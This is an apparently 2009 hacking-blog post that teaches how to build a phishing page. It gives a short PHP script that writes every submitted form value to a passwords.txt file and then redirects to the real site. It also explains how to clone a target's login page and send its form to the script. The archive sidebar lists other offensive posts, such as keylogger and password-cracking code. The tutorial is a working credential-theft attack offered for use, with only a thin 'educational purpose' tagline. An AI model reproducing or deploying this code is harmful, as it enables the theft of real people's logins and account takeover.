Firstly, you need a host with php, like 100mb or freehostia or whatever.
Now, copypaste this and save it as phish.php.
CODE
header("Location: www.site.com");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit; ?>
Edit "www.site.com" to the site you're phishing, coz it redirects to that URL after the person submits the login.
Now, save the login page of whatever site you want to clone.
In the source (open with notepad), find where it says "form action=" and replace the URL with "phish.php", and where it says "method=post", change "post" to "get".
Now, save it, and upload all contents to the site you just made. Make sure all CSS/images/links and stuff work, because your mission is to get a replica page.
Now that should be about all, ask here for any questions.
Coding, Programming examples using amazing small applications only for educational purpose.
All Developing, Hacking & Cracking Codes with Bots
-
▼
2009
(57)
-
▼
March
(21)
- Password Cracking Program code
- Keylogger Programming
- Auto Typer Programming code
- Speed up your Internet speed by 20%
- Dont Display Recent Opened Documents in Start Menu
- How to Hide the drives (c:,d:,e:,...etc) in from y...
- Remove Thumb.db file
- Bypass Passwords in Windows
- Speed Up Windows Vista with a USB Thumb Drive
- Open command prompt from where it is Banned
- Proxy ?? its all hereFinding and Using Anonymous P...
- Enable Right Clicks on The Sites That Disable it
- My PC/Laptop/Computer Hangs / Freezes Up - What to...
- How to make a phisher
- Places that viruses and trojans hide on start up
- How to access the restricted or banned websites?
- How to get someone's IP
- ENTER ANY PORN WEBSITE VIP SECTION WITHOUT PASWD
- ALL PHISPERS
- Tips for Tracing An E-mail
- auto clicker,typer,ptc,media playr,notepad,shutdn,...
-
▼
March
(21)
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment